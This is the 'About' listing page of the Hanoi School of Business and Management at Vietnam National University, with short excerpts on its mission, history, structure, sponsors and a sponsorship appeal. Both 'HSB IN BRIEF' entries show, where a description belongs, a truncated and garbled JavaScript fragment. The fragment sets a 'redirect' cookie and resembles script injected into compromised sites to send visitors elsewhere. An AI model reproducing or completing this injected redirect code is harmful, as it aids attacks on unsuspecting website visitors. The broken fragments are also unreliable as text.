Giới thiệu | Trường Quản trị và Kinh doanh - Đại học Quốc gia Hà Nội

Tầm nhìn, sứ mệnh, giá trị cốt lõi

Tầm nhìn, sứ mệnh, giá trị cốt lõi của Trường Quản trị và Kinh doanh (HSB) Sứ mệnh HSB đào tạo các tài năng trẻ để trở thành các nhà lãnh đạo, điều hành và quản trị cho cả khu vực Công và Tư. Tầm nhìn HSB luôn là Trường Quản trị và Kinh doanh […]

By hsbadmin01 | Giới thiệu
DETAIL

Vision, Mission

Vision HSB is always a refutable school of business and management, pioneering in inter-disciplinary research and training programs for the sustainable development.   Mission HSB educates leaders, managers, and administrators who can change and act for the sustainable development.   Core Values: I – P – Q           Innovation     […]

By hsbadmin01 | Giới thiệu
DETAIL
Th10
18

Lịch sử hình thành Trường quản trị và kinh doanh (HSB) tại ĐHQGHN và Chương trình hợp tác HSB – Trường Kinh doanh Tuck, Dartmouth College

Hơn một thập kỷ làm việc và học hỏi từ các nhà lãnh đạo, giáo sư của HSB cũng như các học viên tham gia theo học chương trình liên kết giữa HSB-Tuck đã mang đến cho tôi và các giảng viên Tuck những kỷ niệm và ảnh hưởng lớn lao.

DETAIL

CƠ CẤU TỔ CHỨC TRƯỜNG QUẢN TRỊ VÀ KINH DOANH (HSB) – ĐHQGHN

BAN GIÁM HIỆU – PGS.TS.Hoàng Đình Phi, Hiệu Trưởng – PGS.TS.Nguyễn Ngọc Thắng, Phó Hiệu Trưởng HỘI ĐỒNG KHOA HỌC VÀ ĐÀO TẠO CÁC TỔ CHỨC CHÍNH TRỊ, XÃ HỘI VÀ ĐOÀN THỂ – Đảng bộ – Công đoàn – Đoàn Thanh niên Cộng sản HCM – Hội Cựu sinh viên CÁC PHÒNG, BỘ PHẬN […]

By hsbadmin01 | Giới thiệu
DETAIL

Danh sách các nhà tài trợ

DANH SÁCH CÁC NHÀ TÀI TRỢ  DANH SÁCH CÁC TẬP THỂ VÀ CÁ NHÂN ĐÓNG GÓP XÂY DỰNG HSB GIAI ĐOẠN 2013 – NAY (liên tục cập nhật) 1 Thầy giáo, Thượng tướng, TS. Nguyễn Văn Hưởng 2 Thượng tướng, viện sỹ, TS. Nguyễn Huy Hiệu 3 PGS.TS. Hoàng Đình Phi 4 GS.TS. Mai Trọng […]

By hsbadmin01 | Giới thiệu
DETAIL

Thư mời tài trợ HSB

Kính gửi: Quý công ty, tổ chức, các đơn vị quan tâm cùng các anh chị học viên, cựu học viên Được thành lập từ năm 1995, Khoa Quản trị và Kinh doanh (Hanoi School of Business and Management – HSB), trực thuộc Đại học Quốc gia Hà Nội (ĐHQGHN), là mô hình nhà trường […]

By hsbadmin01 | Giới thiệu
DETAIL

Hanoi School of Business and Management – HSB IN BRIEF

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

By hsbadmin01 | Giới thiệu
DETAIL

Hanoi School of Business and Management – HSB IN BRIEF en

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

By hsbadmin01 | Giới thiệu
DETAIL